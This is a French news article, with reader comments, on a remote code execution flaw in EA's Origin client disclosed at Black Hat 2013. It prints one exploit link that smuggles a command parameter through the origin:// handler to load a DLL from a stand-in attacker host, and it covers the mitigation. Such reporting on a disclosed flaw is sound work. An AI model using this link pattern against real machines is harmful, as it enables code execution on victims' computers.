Attaquer un PC ou un Mac, c’est simple comme un lien Origin
Une brêche qui touchait déjà Steam
Le 19 mars 2013 à 09h23
3 min
Logiciel
Logiciel
Electronic Arts est décidément sous le feu des projecteurs ces derniers temps, et pas pour de bonnes raisons. Après les soucis de SimCity, c'est au tour de la plateforme Origin de poser des problèmes à l'éditeur, puisqu'une faille très facilement exploitable rend vulnérable n'importe quelle machine à une attaque extérieure.
Electronic Arts revendique un peu plus de 40 millions d'usagers sur sa plateforme Origin, et tous peuvent désormais être la victime d'attaques malveillantes. Nos confrères d'Ars Technica ont relevé durant la conférence Black Hat, s'étant déroulée du 12 au 15 mars à Amsterdam qu'une équipe originaire de Malte est parvenue à utiliser Origin pour attaquer des Macs et des PC.
Donato Ferrante et Luigi Auriemma, deux chercheurs travaillant pour ReVuln, et auteurs de cette découverte, expliquent que la faille découverte ne demande que quelques secondes pour être exploitée. Dans certains cas, aucune interaction avec la victime n'est requise. Notez qu'il n'est pas nécéssaire qu'Origin soit actif pour que la brêche fonctionne, sa seule installation sur le système est suffisante.
Une démonstration qui semble très simple
La démonstration faite par les deux hommes est assez simple, il suffit de trouver un moyen de permettre d'activer l'exécution de code à distance sur la machine cible. Dans le cas d'un joueur de Crysis 3, les chercheurs utilisent le NVidia Benchmark framework intégré dans le moteur CryEngine. Il suffit ensuite de créer un lien Origin afin que la plateforme récupère au prochain lancement du jeu le fichier que l'on souhaite introduire dans la machine cible. Le lien prend la forme suivante :
origin://LaunchGame/71503?CommandParams= -openautomate \\IP_ATTAQUANT\evil.dll
La faille rappelle une de celles découvertes dans Steam
Cependant, il faut noter que la plateforme d'EA n'est pas la seule à être touchée par ce genre de vulnérabilité. En effet, un cas similaire avait touché Steam au mois d'octobre. Si l'intégrité du client de la plateforme n'était pas atteinte, certains pirates faisaient précéder leurs URLs par « Steam:// » pour berner les navigateurs, clients emails ou toutes sortes d'applications afin qu'elles exécutent du code malveillant.
La parade était assez simple puisqu'il suffisait de désactiver le lancement automatique des URL débutant par Steam://. Le même genre de solution est proposée par les chercheurs aux utilisateurs d'Origin, qui leur suggèrent de paramétrer leur navigateur afin qu'il demande une confirmation avant d'exécuter un tel lien. Nous vous laissons maintenant découvrir la faille en images.
Attaquer un PC ou un Mac, c’est simple comme un lien Origin
-
Une démonstration qui semble très simple
Commentaires (58)
Vous devez être abonné pour pouvoir commenter.
Déjà abonné ? Se connecter
Abonnez-vousLe 19/03/2013 à 10h19
Crysis n’est pas un jeu mais un logiciel de benchmark. " />
Le 19/03/2013 à 10h24
Le 19/03/2013 à 10h26
Vive le Cloud" />
Le 19/03/2013 à 10h29
Le 19/03/2013 à 10h32
Le 19/03/2013 à 10h35
Le 19/03/2013 à 10h51
Ceci dit le jeu n’est pas excellent pour autant, les ennemis sont relativement idiots par exemple, mais je tenais à apporter mon point de vue sur la durée de vie du jeu
Invisibilité permanente + Arc, jeu torché
" />
Le 19/03/2013 à 11h01
Le 19/03/2013 à 11h05
N’étant pas du tout un spécialiste je n’ai pas bien compris l’affaire… mais, comme ça, à vue de nez, effectivement, c’est grave.
Ma question : sur PS3, un pirate peut-il utiliser cette faille ?
Le 19/03/2013 à 11h22
Le 19/03/2013 à 11h28
il pourrait etre INterressant que PCI donne la marche a suivre ou un lien vers un article expliquant comment desactiver / limiter l’interpretation des url origin://
" />
Le 19/03/2013 à 11h53
Le 19/03/2013 à 11h55
de toutes les facons vous pouvez tous presumer que vos ordinateurs/tablettes/smartphones soient des bots qui font des choses sans que vous le sachiez (gaffe au webcam et micro). RE-de toutes les facons il faut des competences que peu ont, et c’est relou a detecter meme pour ceux qui les capacites.
Le 19/03/2013 à 12h03
Le 19/03/2013 à 12h29
Réponse d’un porte-parole d’EA : “Our team is constantly investigating hypotheticals like this one as we continually update our security infrastructure.”
Source
Le 19/03/2013 à 12h50
Le 19/03/2013 à 12h52
Le 19/03/2013 à 13h01
Le 19/03/2013 à 13h18
Le 19/03/2013 à 13h32
Le 19/03/2013 à 13h50
Le 19/03/2013 à 13h56
Le 19/03/2013 à 14h02
Le 19/03/2013 à 14h06
Le 19/03/2013 à 14h12
Le 19/03/2013 à 14h15
Le 19/03/2013 à 14h16
J’ai eu une màj d’origin à midi, est-ce lié au problème ?
" />
Le 19/03/2013 à 14h25
Le 19/03/2013 à 14h35
Le 19/03/2013 à 14h48
Le 19/03/2013 à 15h25
Le 19/03/2013 à 16h45
une équipe originaire de Malte est parvenue à utiliser Origin pour attaquer des Macs et des PC
Faux. Mon PC sous Linux ne craint rien.
Le 19/03/2013 à 09h26
J’ai comblé la faille, j’ai pas acheté Crysis 3 " />
Le 19/03/2013 à 09h30
Le 19/03/2013 à 09h33
Le 19/03/2013 à 09h34
J’ai comblé la faille j’ai viré Origin, qui ne me servait plus de toutes façons. :)
Le 19/03/2013 à 09h35
Le 19/03/2013 à 09h35
Le 19/03/2013 à 09h40
Le 19/03/2013 à 09h44
Le 19/03/2013 à 09h45
Le 19/03/2013 à 09h51
Suffit de ne lancer aucun jeu Origin donc. Oh wait.
Le 19/03/2013 à 09h57
Je comprend pas trop la fonctionnement de cette faille, il faut ouvrir un lien qui fait télécharger un fichier qui se copie sur la machine pour l’infecter?
Maintenant je ne vois pas comment arriver à le mettre en place sur une machine ciblée.
Il faut donc cliquer sur un lien dans un navigateur qui va donc au final lancer un jeu? Il faut aussi que le jeu du lien soit installé sur la machine?
Le 19/03/2013 à 09h59
Attaquer Windows ou un Mac, c’est simple comme un lien Origin
" />
Faut-il rappeler que “PC” ne désigne que le hardware, et qu’il est possible d’y installer Windows, GNU/Linux, UNIX…
Ce serait appréciable de ne pas trop entretenir l’égalité “PC = Windows” " />
Le 19/03/2013 à 10h04
oulala je vais le désinstaller, en plus il est pas à jour du tout…
Le 19/03/2013 à 10h09
Le 19/03/2013 à 10h15
J’ai pas Origin ce qui simplifie les choses pour moi ^^
Le 19/03/2013 à 16h58
J’ai acheter ME3 (pour basculer dans la légalité" />) depuis env 1 mois….à quoi sert origin* ?
* mis à part le besoin et l’absolu necessité pour EA de tout savoir tout sur moi et, accessoirement, de me foutre une laisse au cul en se foutant de ma gueulle…
Le 19/03/2013 à 17h44
Le 19/03/2013 à 18h34
La portion de code dans l’article est illisible sur version mobile (gris clair sur blanc)
Le 19/03/2013 à 19h50
Le 19/03/2013 à 19h58
Le 19/03/2013 à 21h29
Le 19/03/2013 à 23h55
Le 20/03/2013 à 05h38
Le 20/03/2013 à 08h49
c’est aussi simple que d’attaquer le Ma" />li
Le 20/03/2013 à 08h57
Le 21/03/2013 à 12h02